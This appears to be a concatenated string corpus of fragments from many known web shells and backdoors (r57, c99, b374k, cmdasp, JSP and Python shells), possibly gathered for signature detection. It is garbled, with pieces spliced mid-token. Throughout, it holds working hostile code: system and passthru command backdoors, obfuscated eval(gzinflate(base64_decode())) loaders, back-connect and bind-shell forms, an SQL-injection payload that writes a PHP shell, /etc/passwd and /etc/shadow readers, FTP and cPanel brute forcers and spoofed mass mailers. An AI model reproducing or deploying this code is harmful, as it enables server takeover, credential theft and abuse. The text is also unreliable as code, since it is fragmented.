edition/* connectback-backdoor on perl<form action=<?=$script?>?act=bindshell method=post>$logo = \"r0lgodlhmaawaoyaaaaaap////r// backdoor.jspjsp backdoor reverse shellmailto:rhfactor@antisocial.com?raiz=rootdigo corrompido<br>corrupt codekey = \"5dcadac1902e59f7273e1902e5ad8414b1902e5abf3e661902e5b554fc41902e53205ca0ntdaddy v1.9 by obzerve of fux0r inc<error: this is not a text file>raw d.o.s. command interfacesimattacker - vrsion : 1.0.0 - priv8 4 my friend fputs ($fp ,\"\\n*********************************************\\nwelcome t0 simecho \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora<title>remote explorer</title> fso.copyfile request.querystring(\"folderpath\") & request.querystring(\"copyfi<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f{mkdir(\"$dizin/$duzenx2\",777)$baglan=fopen($duzkaydet,'w');phvayv 1.0set aktifklas=request.querystring(\"aktifklas\")action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%><font color=\"#858585\">www.aventgrup.netstyle=\"background-color: #95b4cc; border-bottom: #000000 1px inset; border-leftr57shell else if ($http_post_vars['with'] == \"lynx\") { $http_post_vars['cmd']= \"lynx rush security team'ru_text12' => 'back-connectc:\\tmp\\dump_rst mysqlhttp://rst.void.ru$st_form_bg='r0lgodlhcqajaiaaaofo6u7w8yh5baaaaaaalaaaaaajaakaaaipjaonujfnhjh0qtfw0lcvads=';#use: python wh_bindshell.py [port] [password]python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"#bugz: ctrl+c etc =script stoped=network security team :: cgi shell#########################<<konec>>#######################################if (!defined$param{pwd}){$param{pwd}='enter_password'};##eval(gzinflate(base64_decode('hj3hkqnqeku/zzqcbd4t8v4yaqi2e3jvpv8/1gw6orsvflyxef//$message.= \"--{$mime_boundary}\\n\" .\"content-type: {$fileatt_type};\\n\" .$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplogmove_uploaded_file($userfile, \"entrika.php\"); send this file: <input name=\"userfile\" type=\"file\"><input type=\"hidden\" name=\"max_file_size\" value=\"100000\">w a r n i n g: private server$message = q$<pre><font color=\"#669999\"> _____ _____ _____ _____ w3d shellby: warpboyno query executedwebshell.cgi<td><code class=\"entry-[% if entry.all_rights %]mine[% elsewinx shellcreated by greenwood from n57<td><font color=\\\"#990000\\\">win dir:</font></td>$def_ports=array (1=>'tcpmux (tcp port service multiplexer)',2=>'management util$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['http.::[c0derz]::. web-shellhttp://c0derz.org.uavint21h@c0derz.org.ua$name='63a9f0ea7bb98050796b649e85481845';//rootnews remote php shell injectionphp shell <br /><input type = \"text\" name = \"url\" value = \"codz by angel(4ngel)web: http://www.4ngel.net$admin['cookielife'] = 86400;$errmsg = 'the file you want downloadable was nonexistent';$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_session[ak-74 security team web site: www.ak74-team.net$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\"welcome to phpremoteview (remview)pysystemstate.initialize(system.getproperties(), null, argv);public class jythonshell extends jpanel implements runnable {public static int default_scrollback = 100drmist.ruhidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80stnc webshellhttp://www.security-teams.net/index.php?showtopic=azrailphp<br><center><input type='submit' name='dy' value='dosya yolla!'></center><center><input type='submit' name='okmf' value='tamam'></center>;$sd98=\"john.barker446@gmail.com\"print \"sending mail to $to....... \";<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei$dump_file.='`'.$rows2[0].'`filename=\\\"dump_{$db_dump}_${table_dcmdasp.asp-- use a poor man's pipe ... a temp file --maceo @ dogmile.com<!-- simple php backdoor by dk (http://michaeldaw.org) -->usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwdsoomin kimsmkim@popeye.snu.ac.krecho \"<td><a href='$php_self?action=deletedata&dbname=$dbname&tablename=$tablenemperor hacking teamsimshell<form name=\"shell\" action=\"<?php echo $_server['php_self'] ?>\" method=\"post[url=http://www.governmentsecurity.orgperl asmodeus.pl client 6666 127.0.0.1print \"asmodeus perl remote shell$internet_addr = inet_aton(\"$host\") or die \"aloa:$!\\n\";#phpmyadmin mysql-dump;db_connect();header('content-type: application/octetstr$data .= \"#database: $databasemehdi & holydemonwww.infilak.'*t@*r@#@&mms^pdbybvubcaaa==^#~@%><form method=post name=inf><table width=\"75%<title>[additinal tittle]-phpshell by:[yourname]<?php echo phpshell_version ?></href=\"mailto: [you can enter your mail here]- [additional text]</a></i>@chdir($work_dir) or ($shelloutput = \"myshell: can't change directory.echo \"<font color=$linkcolor><b>myshell file editor</font> file:<font color $fileeditinfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;owner: <font color=$simorgh security magazine simshell.css} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_request['command'], www.simorgh-ev.comkj021320case 't':systemtools(out);break;out.println(\"<tr><td>\"+ico(50)+f[i].getname()+\"</td><td> file<die(\"couldn't read directory, blocked!!!\");php web shellshells.dl.amthis server has been infected by $owner<input type=\"submit\" value=\"include!\" name=\"inc\"></p>could not write to file! (maybe you didn't enter any text?)#we are: masterkid, alexutz, fatman & mikutul echo --==userinfo==-- ; id;echo;echo --==directory==-- ; pwd;echo; echo --==shelconnectback backdoortarget fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>eval(base64_decode(\"zxzhbchiyxnlnjrfzgvjb2rlkcjhv2r1yjnkbfgzvnpawepmwvdkdmnuuw9<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center$back_connect_p=\"iyevdxnyl2jpbi9wzxjsdqp1c2ugu29ja2v0ow0kjglhzgrypwluzxrfyxrvbiecho '<h1>execution php-code</h1><div class=content><form name=pf method=posecho \"[dir] <a href=\\\"\".$_server['php_self'].\"?rep=\".realpath($rep.\"..class backdoor {echo \"<a href=\\\"\".$_server['php_self'].\"?copy=1\\\">copier un fichier</a> <if int((1-0+1)*rnd+0)=0 then makeemail=maketext(8) & \"@\" & maketext(8) & \".\"<form name=frmcmd method=post action=\"<%=gurl%>\">dim zombie_array,special_arrayhttp://vnhacker.orgd7nd7l.km4snk`jzknd{n_ejq;bd{kbpur#kq8aaa==^#~@%>></td><td><input type=\"submitprint \"\\n\".'<tr><td width=100pt class=linelisting><nobr>post (php eval)</td><dizin</font></b></font><font face=\"verdana\" style=\"font-size: 8pt\"><s72 shell v1.0 codinf by cr@zy_kingecho \"<p align=center>dosya zaten bulunuyor</p>\"<?$d='g7mhwq9vvxil/qx2oz2vtdpo6g3fyaa6x+8dmizcd0ehzabzh7jfpzzuz7xnenxsyvbp2wy36ukacak fso 1.0if request.querystring(\"tgh\") = \"1\" then<font color=\"#858585\">buqx</font></a></font><font face=\"verdana\" style=mailto:buqx@hotmail.comlord of iran hackers sabotagelord-c0d3r-nt$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);# [+] domain name address typewww.antichat.rucan't open file, permission denidehas been already loaded. php emperor <xb5@hotmail.action=mysqlread&mass=loadmass\">load all defaultsif (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthruprint \"<tr><td><b>server is:</b></td><td>\".$_server['server_signature'].\"</tdprint \"<tr><td><b>execute command:</b></td><td><input size=100 name=\\\"_cmdcoded by n0 [nzer0] www.cyberlords.netu29mdhdhcmuaqwrvymugsw1hz2vszwfkexhjztwaaaamuexurf///waaajmzzaaaacjourkaaaaereturn \"<br>dump error! can't write to \".htmlspecialchars($file);call os.run(\"win.com cmd.exe /c del \"& sztf,0,true)<div align=\"left\"><font size=\"1\">input command :</font></div><input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br><input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>ayyildiztouch by ijoofirst we check if there has been asked for a working directoryhttp://ayyildiz.org/images/whosonline2.gifejder was here*~pu*&bp[_)f!8c2f*@#@&~,p~p,~p&q~8bpms~9~~lb~x`v,_,f&*~,jcw~~[_c3trffzq@#@&pp,~~lama's'hellif($_post['king'] == \"\") {if (move_uploaded_file($_files['fila']['tmp_name'], $curdir.\"/\".$_files['fnewhtml = '<b>file browser is under construction! use at your own risk!</b> <br>empty command..type \\\"shellhelp\\\" for some ehh...helpnewhtml = '<font size=0><b>this will reload the page... :(</b><br><br><form enctjspwebshellcreateanddeletefolder is error:<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryhashtable(\"java.cstring _password =\"111\";$baglan=fopen(\"/tmp/$ekinci\",'r');$tampon4=$tampon3-1@aventgrup.net$yazi = \"test\" . \"\\r\\n\";fwrite ($fp, \"$yazi\");$entry_line=\"hacked by entrika\";sh_out=os.popen(shell+\" \"+cmd).readlines()# d00r.py 0.3a (reverse|bind)-shell in python by fqprint \"error; help: head -n 16 d00r.py\"print \"pw:\",pw,\"port:\",port,\"host:\",host$error_text = '<strong>failed selecting database \"'.$this->db['<div align=\"center\">the backup process has now started<br </a><a href='\"&dosyapath&\"?status=10&dpath=\"&f1.path&\"&path=\"&path&\"&time=<input type=submit value=\"test et!\" onclick=\"$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/eshow <input type=text size=5 value=\".((isset($_post['br_st']))?$_post['br_st']:echo \"fichier telecharge dans \".good_link(\"./\".$_files[\"fic\"][\"naif(move_uploaded_file($_files[\"fic\"][\"tmp_name\"],good_link(\"./\".$_fiecho \"cliquez sur un nom de fichier pour lancer son telechargement. cliquez s$dl=$_request['download'];else shell(\"perl.exe $name $port\");fputs ($fp, \"# rst mysql tools\\r\\n# home page: http://rst.void.ru\\r\\n#a cgi by fuzzyman\"\"\"+fontline +\"version : \" + versionstring + \"\"\", running on : \"\"\" + values = map(lambda x: x.value, theform[field]) # allows for<title>ru24postwebshell - \".$_post['cmd'].\"</title>if ((!$_post['cmd']) || ($_post['cmd']==\"\")) { $_post['cmd']=\"id;pwd;uname -awrited by dreamerzr3v3ng4ns\\ndigiteif(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: it seems that the permissiif (empty($cmd) and $ch_msg==\"\") echo (\"comandos exclusivos do dtool pro\\n0ldw0lfhowever you are lucky :pi'm fuckedioctl($client{$client}->{shell}, &tiocswinsz, $winsize);#atrix@irc.brasnet.org$dataout .= \"<td><a href='$myloc?$sreq&incdbhost=$myhost&incdbuser=$myuser&incdif($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $stroutput .= dbsafe0verscript gecisi tamamlayamadi!document.write(unescape('%3c%68%74%6d%6c%3e%3c%62%6f%64%79%3e%3c%53%43%52%49%50%/* we have found the parent dir. we must be carefull if the parent $tmpfile = tempnam('/tmp', 'phpshell');if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {www.rohitab.comprint \"set-cookie: savedpwd=;\\n\"; # remove password cookie$prompt = $winnt ? \"$currentdir> \" : \"[admin\\@$servername $cwww.ironwarez.info$cookiename = \"wieeeee\";~ shell iwww.rootshell-team.infosetcookie($cookiename, $_post['pass'], time()+3600);www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tanprint(\"<br>provenance du mail : <input type=\\\"text\\\" name=\\\"provenancif mcolformelem.exists(lcase(sindex)) then form = mcolformelem.item(lcase(sindex))session(\"shagman\")=// note that linux = cmd and windows = \"cmd.exe /c + cmd\" h4ntu shellsystem(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");set entrika = entrika.createtextfile(\"c:\\net.vbs\", true)http://www35.websamba.com/cybervurgun/>[*] safemode mode run</div>$file1 - $file2 - <a href=$script_name?$query_string&see=$file>$file</a><br>[*] spawning shellcha0shttp://popeye.snu.ac.kr/~smkim/mysqlhref='$php_self?action=dropfield&dbname=$dbname&tablename=$tablename<th>type</th><th>&nbspm&nbsp</th><th>&nbspd&nbsp</th><th>unsigned</th><th>zerofi<title>g-security webshell</title><input type=text name=\"-cmd\" size=64 value=\"<?=$cmd?>\" <? if($cmd != \"\") print shell_exec($cmd);?><? $cmd = $_request[\"-cmd\"];?>echo \"<b>changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\"echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur<tr><form method=post><td><font color=red><b>back connect:</b></font></td><td><i$perl_proxy_scp = \"iyevdxnyl2jpbi9wzxjsicancimhl3vzci91c2mvcgvybc81ljawnc9iaw4v<tr><form method=post><td><font color=red><b>backdoor:</b></font></td><td><input.textbox { background: white; border: 1px #000000 solid; color: #000099; font-fa<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''echo \"<hr size=\\\"1\\\" noshade><b>done!</b><br>total time (secs.): \".$ft$fqb_log .= \"\\r\\n------------------------------------------\\r\\ndone!\\r'eng_text71'=>\"second commands param is:\\r\\n- for chown - name of new owner oif(!empty($_post['s_mask']) && !empty($_post['m'])) { $sr = new searchresult\"aaaaach5baeaaakalaaaaaauabqaaar0mmljqyzfalqeqjugeqscnwg6fogpkhamf4hajswh7/ze\"\"mtp/zdp//2yaagyam2yazmyamwyazgya/2yzagyzm2yzzmyzmwyzzgyz/2zmagzmm2zmzmzmmwzm\"\"r0lgodlhfaauakl/ap/4/8dawh9/ap/4al+/vwaaaaaaaaaaach5baeaaaealaaaaaauabqaqamo\"echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_post['echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db> if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\" if (file_exists($mkfile)) {echo \"<b>make file \\\"\".htmlspecialchars($mkfile echo \"<center><b>mysql \".mysql_get_server_info().\" (proto v.\".mysql_get_pr elseif (!fopen($mkfile,\"w\")) {echo \"<b>make file \\\"\".htmlspecialchars($m$sess_data[\"cut\"] = array(); c99_sif ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))c99sh_sqlqueryelse {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != directory_sepaelse {echo \"<b>file \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',$name='ec371748dc2da624b35a4f8f685dd122'echo ws(2).$lb.\" <a$sql = \"load data infile \\\"\".$_post['test3_file']if (empty($_post['cmd'])&&!$safe_mode) { $_post['cmd']=($windows)?(\"dir\"):(\"lif(eregi(\"./shbd $por\",$scan))$_post['backconnectip']$_post['backcconnmsg']if(rmdir($_post['mk_name']))$r .= '<tr><td>'.ws(3).'<font face=verdana size=-2><b>'.$key.'</b></font></td>if(unlink($_post['mk_name'])) echo \"<table width=100% cellpadding=0 cell\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mviecho \"<b>execute file:</b><form action=\\\"\".$surl.\"\\\" method=post><inpu\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswdreturn $type . $owner . $group . $other;$owner = ($mode & 00400) ? 'r' : '-';sncirwcm90bz1nzxrwcm90b2j5bmftzsgndgnwjyk7dqpzb2nrzxqou09ds0vulcbqrl9jtkvulcbtt0a8c3lzl3nvy2tldc5opg0ki2luy2x1zgugpg5ldgluzxqvaw4uad4ncinpbmnsdwrlidxlcnjuby5opg<b>dumped! dump has been writed to if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<table st<input type=submit name=actarcbuff value=\\\"pack buffer to archive@ini_set(\"highlightecho \"<b>result of execution this php-code</b>:<br>\";{$row[] = \"<b>owner/group</b>\";}echo $uname.\"</font><br><b>\";while(!feof($f)) { $res.=fread($f,1024); }echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()c99ftpbrutecheck$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);$fqb_lenght = $nixpwdperpage;$sock = @ftp_connect($host,$port,$timeout);$sqlquicklaunch[] = array(\"else {echo \"<center><b>file does not exists (\".htmlspecialchars($d.$f).\")!<if(@$_post['save'])writef($file,$_post['data']);if($action==\"phpeval\"){$uploadfile = $dirupload.\"/\".$_post['filename'];$dir=getcwd().\"/\";if (!empty($delerr)) {echo \"<b>deleting with errors:</b><br>\".$delerr;}if ($filename != \".\" and $filename != \"..\"){$dires = $dires . $directory;$arr = array_merge($arr, glob(\"*\"));@$rto=$_post['rto'];scrollbar-track-color: #91aaff$to1=str_replace(\"//\",\"/\",$to1); if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\": $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";$result = mysql_query(\"show processlist\", $sql_sock); elseif (!empty($ft)) {echo \"<center><b>manually selected type is incorrect. ielse {echo \"<center><b>unknown extension (\".$ext.\"), please, select type ma$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";if ($total === false) {$total = 0;}$free_percent = round(100/($total/$free),2);if (!$bool) {$bool = is_dir($letter.\":\\\\\");}$bool = $isdiskette = in_array($letter,$safemode_diskettes);$res = mssql_query(\"select * from r57_temp_table\",$db);'eng_text30'=>'cat file',@mssql_query(\"drop table r57_temp_table\",$db);$num = $nixpasswd + $nixpwdperpage;$ret = posix_kill($pid,$sig);if ($uid) {echo join(\":\",$uid).\"<br>\";}$i = $nixpasswd;form method=post><input type=hidden name=\"\"#\"\" value=execute(session(\"\"#\"\"))><input name=thepath value=\"\"\"&htmlencode(server.mappath(\".\"))&else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);lsext = right(filename, len(filename) - licount)response.write drive.sharename & \" [share]\"if request.querystring(\"copyfile\") <> \"\" then<td width=\"40%\" height=\"20\" bgcolor=\"silver\"> name</td>@rmdir($_get['file']) or die (\"[-]error deleting dir!\");$ps=str_replace(\"\\\\\",\"/\",getenv('document_root'));header(\"expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));search_file($_post['search'],urldecode($_post['dir']));echo base64_decode($images[$_get['pic']]);if (isset($_get['rename_all'])) {$from = rand (71,1020000000).\"@\".\"attacker.com\";&nbsp;turkish hackers : www.alturks.com <br>&nbsp;programer : simattacker - edited by kingdefacer<br>//fake mail = use victim server 4 dos - fake mail &nbsp;e-mail : kingdefacer@msn.com<br>error_reporting(e_error | e_warning | e_parse);echo \"<font size='1' color='#999999'>dont in windows\";$comments=$_post['comments'];function phpget(){inclvar(); if(confirm(\"o phpget agora oferece uma lista pront<font size=3>by r3v3ng4ns - revengans@gmail.com </font>function phpwriter(){inclvar();var url=prompt(\"[ phpwriter ] by r3v3ng4ns\\ndig//turns the 'ls' command more usefull, showing it as it looks in the shellif (@file_exists(\"/usr/bin/wget\")) $pro3=\"<i>wget</i> at /usr/bin/wget, \";//to keep the changes in the url, when using the 'get' way to send php variablesfunction phpf(){inclvar();var o=prompt(\"[ phpfileditor ] by r3v3ng4ns\\ndigite if(empty($fu)) $fu = @$_get['fu'];<title>'.getenv(\"http_host\").' ~ shell i</title>$link = mysql_connect($_post['host'], $_post['username'], $_posterror_reporting(0); //if there is an error, we'll show it, k?print \"<form action=\\\"\".$me.\"?p=chmod&file=\".$content.\"&dif(!is_numeric($_post['timelimit']))if($_post['chars'] == \"9999\")<option value=\\\"az\\\">a - zzzzz</option>print shell_exec($command);<meta http-equiv=\"content-language\" content=\"tr\"><title>www.sanalteror.org - indexer and reader</title><form action=\"?gonder\" method=\"post\"><form action=\"?oku\" method=\"post\">var message=\"sanalteror - ndexer - reader\"cprthtml = \"<font face='arial' size='1'>rhtools 1.5 beta(pvt) edited by kingdefbarrapos = cint(instrrev(left(raiz,len(raiz) - 1),\"\\\")) - 1destino3 = folderitem.path & \"\\index.asp\"@error_reporting(0);@eval(gzinflate(base64_decode($code)));@set_time_limit(0); </font></span><a href=\"mailto:shopen@aventgrup.net\"><title>:: aventgrup ::.. - sincap 1.0 | session(oturum) b</span>avrasya veri ve network teknolojileri geliwhile (($ekinci=readdir ($sedat))){$deger2= \"$ich[$tampon4]\";// encrypt your password to md5 here http://kerinci.net/?x=decode// password (default is: b374k)//******************************************************************************// b374k 2.2eval(\"?>\".gzinflate(base64_decode(&nbsp;iranian hackers : www.simorgh-ev.com <br><a style=\"text-decoration: none\" href=\"http://www.simorgh-ev.com\">victim mail :<br><input type='text' name='to' ><br><title>h4ntu shell [powered by tsoi]</title>$cmd = $_post['cmd'];$uname = posix_uname( );echo \"<p><font size=2 face=verdana><b>this is the server information</b></font>ob_end_clean();<title>myshell error - access denied</title>$adminemail = \"youremail@yourserver.com\";//a workdir has been asked for - we chdir to that dir.system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o#$autoerrortrap enable automatic error traping if command returns error./* no work_dir - we chdir to $document_root */#every command you excecute.<form name=\"shell\" method=\"post\">if ($_post['cmd']){echo \"file uploaded to $dez\";if (file_exists($uploaded)) {passthru($cmd);ster\" name=submit> </font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail hacking font-weight: bold; background: #ffffff url('images/cellpic1.gif'); text-indent: padding-right: 8px; padding-left: 8px; font-weight: bold; font-size: 11px; backg<option value=\"/etc/passwd\">get /etc/passwd</option>by php emperor<xb5@hotmail.com>\".htmlspecialchars($file).\" has been already loaded. php emperor <xb5@hotmail.die(\"<font color=\\\"red\\\"><center>sorry... fileif(empty($_get['file'])){echo \"<head><title>safe mode shell</title></head>\"; $liz0zim=shell_exec($_post[liz0]); $liz0=shell_exec($_post[baba]); echo \"<b><font color=blue>liz0zim private safe mode command execuriton bypass e :=) :</font><select size=\"1\" name=\"liz0\">http://<? echo $server_name.$request_uri; ?>?d=/etc on *nix// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombiif(!isset($_request['dir'])) die('hey,specify directory!');else echo \"<a href='$php_self?f=$d/$dir'><font color=black>\";if( $_post['_act'] == \"upload!\" ) {print \"<center><h1>#worst @dal.net</h1></center>\";print \"<center><h1>linux shells</h1></center>\";$currentcmd = \"ls -la\";print \"<tr><td><b>system type:</b></td><td>$uname</td></tr>\";$currentcmd = str_replace(\"\\\\\\\\\",\"\\\\\",$_post['_cmd']);echo '<a href='.$expurl.'> click here to exploit </a> <br />';<form action = \"<?php echo \"$_server[php_self]\" ; ?>\" method = \"post\">$sql = \"0' union select '0' , '<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 infull server path to a writable file which will contain the php shell <br />$expurl= $url.\"?id=\".$sql ;<header>|| .::news php shell injection::. ||</header> <br /> <br /><input type = \"submit\" value = \"create exploit\"> <br /> <br /><title>webcommander at <?=$_server[\"http_host\"]?></title>/* webcommander by cr4sh_aka_rkl v0.3.9 ngh edition :p */<form action=<?=$script?>?act=backconnect method=post><form action=<?=$script?>?act=mkdir method=post>die(\"<font color=#df0000>login error</font>\");<b>bind /bin/bash at port: </b><input type=text name=port size=8>$command .= ' -f';/* we try and match a cd command. */directory... trust me - it works :-) */$command .= \" 1> $tmpfile 2>&1; \" .$new_dir = $regs[1]; // 'cd /something/...'/* the last / in work_dir were the first charecter.http://www.ru24-team.net$function=passthru; // system, exec, cmd$md5_pass = \"\"; //if no pass then hash$pass = \"pass\"; //pass$login = \"user\"; //login //authentication$encoded = base64_encode(file_get_contents($d.$f)); $file = $tmpdir.\"dump_\".getenv(\"server_name\").\"_\".$db.\"_\".date(\"d-m-yelse {$tmp = htmlspecialchars(\"./dump_\".getenv(\"server_name\").\"_\".$sq$c99sh_sourcesurl = \"http://locus7s.com/\"; //sources-server $nixpwdperpage = 100; // get first n lines from /etc/passwd system.out.println(\"createanddeletefolder is error:\"+ex); string password=request.getparameter(\"password\");<%@ page contenttype=\"text/html; charset=gbk\" language=\"java\" import=\"java.string editfile=request.getparameter(\"editfile\");//string tempfilename=request.getparameter(\"file\");$scriptident = \"$scripttitle by evilc0der.com\";while (file_exists(\"$lastdir/newfile$i.txt\"))else { /* <!-- then it must be a file... --> */$contents .= htmlentities( $line ) ;<br><p><br>safe mode bypass<p><form method=\"post\">elseif ( $cmd==\"upload\" ) { /* <!-- upload file form --> */ /* <!-- end of actions --> */$adres=gethostbyname($ip);curl_setopt($ch,curlopt_postfields,\"domain=\".$site);$ekle=\"/index.php?option=com_user&view=reset&layout=confirm\";echo $son.' <br> <font color=\"green\">access</font><br>';<p>kodlama by <a href=\"mailto:priv8coder@gmail.com\">blaster</a><br /<p><strong>server listeleyici</strong><br /># author homepage: http://www.rohitab.com/elsif($action eq \"command\") # user wants to run a command# in a command line on windows nt.print \"transfered $targetfilesize bytes.<br>\";<!-- http://michaeldaw.org 2006 --> echo \"</pre>\"; $cmd = ($_request['cmd']); echo \"<pre>\"; die; system($cmd);xb5@hotmail.com</font></center></b>\");$v = @ini_get(\"open_basedir\");| -obzerve : mr_o@ihateclowns.com |<form action=ntdaddy.asp method=post>response.write(\"<error: this is not a text file>\")if(($_post['exe']) == \"execute\") {$curcmd = $_post['king'];\"http://www.w3.org/tr/html4/loose.dtd\"><title>lama's'hell v. 3.0</title>_|_ o _ o _|_$curcmd = \"ls -lah\";$content = chunk_split(base64_encode($content)); print \"sending mail to $to....... \"; if (!$from && !$subject && !$message && !$emaillist){ $pass = \"\"; //pass$login = \"\"; //login' author: maceo <maceo @ dogmile.com>' -- use a poor man's pipe ... a temp file -- '' --------------------o0o--------------------' file: cmdasp.asp<-- cmdasp.asp -->set oscriptnet = server.createobject(\"wscript.network\") if (isset($_files['probe']) and ! $_files['probe']['error']) {<b>--coded by silver<title>upload - shell/datei</title><a href=\"http://www.n-c-c.6x.to\" target=\"_blank\">-->ncc<--</a></center></b><~|_team .:national cracker crew:._|~<br>printf(\"sie ist %u bytes grocommon php webshells. do not host the file(s) in your server!php-webshells$headers .= \"\\nmime-version: 1.0\\n\" .\"content-type: multipart/mixed;\\n\" .* as email attachment, or send to a remote ftp server by* neagu mihai<neagumihai@hotmail.com>$from = \"neu-cool@email.com\"; // who should the emails be sent from?, may - ak-74 security team web site: www.ak74-team.net<b><font color=#830000>8. x forwarded for ip - </font></b><font color=#830000>'.<b><font color=#83000>execute system commands!</font></b>function ftp_check($host,$user,$pass,$timeout){curl_setopt($ch, curlopt_url, \"http://$host:2082\");[ user@alturks.com ]# info<b><br><font face=tahoma><br>curl_setopt($ch, curlopt_ftplistonly, 1);powerful tool , ftp and cpanel brute forcer , php 5.2.9 safe_mode & open_basedir<br><b>please enter your username and password to logon<br><?php passthru(getenv(\"http_accept_language\")); echo '<br> by q1w2e3r4'; ?><p>more: <a href=\"/\">md5cracking.com crew</a> href=\"/\" title=\"securityhouse\">security house - shell center - edited by kinecho '<pre><p>this is exploit from <a this exploit was edited by kingdefacersafe_mode and open_basedir bypass php 5.2.9 $hardstyle = explode(\"/\", $file); while($level--) chdir(\"..\"); if(isset($_post[\"action\"])) $action = $_post[\"action\"];elseif(fe(\"system\")){ob_start();system($s);$r=ob_get_contents();ob_end_clean(){ $pwd = $_post[\"pwd\"]; $type = filetype($pwd); if($type === \"dir\")chdir($pw<title>tryag team - tryag.php - edited by kingdefacer</title>$tabledump = \"drop table if exists $table;\\n\"; $string = !empty($_post['string']) ? $_post['string'] : 0; $tabledump .= \"create table $table (\\n\"; echo \"<center><div id=logostrip>edit file: $editfile </div><form action='$requeheader(\"last-modified: \".date(\"r\",filemtime(__file__)));header(\"content-type: image/gif\");@copy($file,$to) or die (\"[-]error copying file!\");// a robust backdoor script made by daniel berliner - http://www.qsdconsulting.cif(isset($_post[\"newcontent\"]))foreach($parts as $val)//assemble the path back together$_post[\"newcontent\"]=urldecode(base64_decode($_post[\"newcontent\"]));kingdefacer@msn.com</font></center></b>\");if($_post['root']) $root = $_post['root'];\".htmlspecialchars($file).\" bu dosya zaten goruntuleniyor<kingdefacer@msn.com>by kingdefacer from spygrup.org>header(\"content-length: \".filesize($_post['downf']));if($_post['save']==0){echo \"<textarea cols=70 rows=10>\".htmlspecialchars($dumpwrite(\"#\\n#server : \".getenv('server_name').\"foreach(@file($_post['passwd']) as $fed)echo $fed;<meta name=\"copyright\" content=touch by ijoo\">/* ls looks much better with ' -f', imho. */} else if ($command == 'ls') {$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];### gamma group <http://www.gammacenter.com>my $error = \"this command is not available in the restricted mode.\\n\";my $command = $self->query('command');target = \"d:\\hshome\\masterhr\\masterhr.com\\\" ' ---directory to which filesnpos = instrb(nposend, bidata, cbytestring(\"content-type:\"))document.frmsql.mpage.value = document.frmsql.mpage.value - 1if request.querystring(\"getdrvs\")=\"@\" then' ---copy too folder routine start// string tempfilepath=request.getparameter(\"filepath\");endpoint=random1.getfilepointer();if (request.getparameter(\"command\") != null) {#to execute commands, simply include ?cmd=___ in the url. #$query = \"show columns from \" . $_get['table'];$uakey = \"724ea055b975621b9d679f7077257bd9\"; // md5 encoded user-agentecho(\"<form method='get' name='shell'>\");echo(\"<form method='post' action='?act=sql'>\");// it's simple shell for all win os.//------- [netstat -an] and [ipconfig] and [tasklist] ------------<html><head><title>-:[greenwood]:- winx shell</title></head>// created by greenwood from n57 if (is_uploaded_file($userfile)) {\" printf(\\\"usage: %s [host] <port>\\\\n\\\", argv[0]);\\n\" .if ($portscan != \"\") {echo \"<br>banner: $get <br><br>\";$dono = get_current_user( );// dump database [pacucci.com]$dump = \"-- database: \".$_post['db'] .\" \\n\";$aids = passthru(\"perl cbs.pl \".$_post['connhost'].\" \".$_post['connport']);<b>ip:</b> <u>\" . $_server['remote_addr'] .\"</u> - server 